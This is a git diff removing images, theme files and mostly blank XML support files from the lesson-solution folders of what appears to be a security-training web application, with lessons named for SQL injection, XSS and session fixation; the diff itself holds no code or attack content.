--- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
deleted file mode 100644
index abc27092d..000000000
--- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png
deleted file mode 100644
index eb4392c2d..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg
deleted file mode 100644
index 6301ccbb1..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png
deleted file mode 100644
index b6bf2f272..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg
deleted file mode 100644
index d94ac96c1..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png
deleted file mode 100644
index 4a274e847..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg
deleted file mode 100644
index b93cbad84..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png
deleted file mode 100644
index feb782736..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png
deleted file mode 100644
index 002ceece2..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png
deleted file mode 100644
index d7c056258..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png
deleted file mode 100644
index a905298d0..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png
deleted file mode 100644
index c0579ce8f..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png
deleted file mode 100644
index a3edf2e13..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml
deleted file mode 100644
index dbcf5ad0e..000000000
--- a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png
deleted file mode 100644
index 61f7e63a1..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png
deleted file mode 100644
index faf59c077..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png
deleted file mode 100644
index 4f4f0608a..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png
deleted file mode 100644
index 04494b197..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg
deleted file mode 100644
index b2529e37c..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg
deleted file mode 100644
index da2d8692a..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg
deleted file mode 100644
index efdefff06..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg
deleted file mode 100644
index 8375ab7cd..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx b/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml
deleted file mode 100644
index 2c3012bc9..000000000
--- a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png
deleted file mode 100644
index baa4ba50f..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg
deleted file mode 100644
index f9ab80c9b..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png
deleted file mode 100644
index ab5ed9af8..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg
deleted file mode 100644
index c12c37f71..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png
deleted file mode 100644
index f46b3b8f7..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg
deleted file mode 100644
index d7c4069ba..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png
deleted file mode 100644
index a841fc1d5..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg
deleted file mode 100644
index 2d4b523a5..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png
deleted file mode 100644
index 2b7656cc1..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg
deleted file mode 100644
index 910fb47dc..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg
deleted file mode 100644
index fc258a811..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx b/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg
deleted file mode 100644
index 025d0c4c0..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg
deleted file mode 100644
index 0b5b82073..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml
deleted file mode 100644
index ce53b8ce8..000000000
--- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png
deleted file mode 100644
index 4876d330e..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg
deleted file mode 100644
index 11fa10d47..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png
deleted file mode 100644
index 272aa8b2b..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg
deleted file mode 100644
index 38109d42f..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png
deleted file mode 100644
index f2868eb02..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg
deleted file mode 100644
index eb31b8e72..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png
deleted file mode 100644
index bbafec0a6..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png
deleted file mode 100644
index 54ef52882..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml
deleted file mode 100644
index a3cfc699b..000000000
--- a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png
deleted file mode 100644
index 1ad882b5f..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png
deleted file mode 100644
index d44ec5c39..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png
deleted file mode 100644
index 5a5d10342..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg
deleted file mode 100644
index ca84b8469..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg
deleted file mode 100644
index 8ece60e0a..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg
deleted file mode 100644
index c0313ee42..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
deleted file mode 100644
index 010502f71..000000000
--- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png
deleted file mode 100644
index 398af0841..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg
deleted file mode 100644
index 52526d118..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png
deleted file mode 100644
index d22701fe3..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg
deleted file mode 100644
index 4b222b8f0..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png
deleted file mode 100644
index 8c9ea75b7..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg
deleted file mode 100644
index 6a1c67f50..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml
deleted file mode 100644
index 90de9a7db..000000000
--- a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png b/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png
deleted file mode 100644
index 1a73bd667..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg
deleted file mode 100644
index fd3b3d48e..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml
deleted file mode 100644
index 679895ff7..000000000
--- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png
deleted file mode 100644
index 4c5655e62..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg
deleted file mode 100644
index 62a30cf94..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png
deleted file mode 100644
index 8fd3ad15c..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg
deleted file mode 100644
index 2a5943d8f..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png
deleted file mode 100644
index 861f3dc14..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg
deleted file mode 100644
index fae87c128..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png
deleted file mode 100644
index 46049533d..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg
deleted file mode 100644
index fe5aa8442..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx b/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml
deleted file mode 100644
index 5f46ccf32..000000000
--- a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png
deleted file mode 100644
index 3268c9b0a..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png
deleted file mode 100644
index 25ea1988a..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png
deleted file mode 100644
index 63f42f9de..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png
deleted file mode 100644
index 9ca7703d6..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg
deleted file mode 100644
index fb0e23ea9..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg
deleted file mode 100644
index cb7259343..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg
deleted file mode 100644
index 300095af6..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg
deleted file mode 100644
index 2d00abf25..000000000
Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg and /dev/null differ
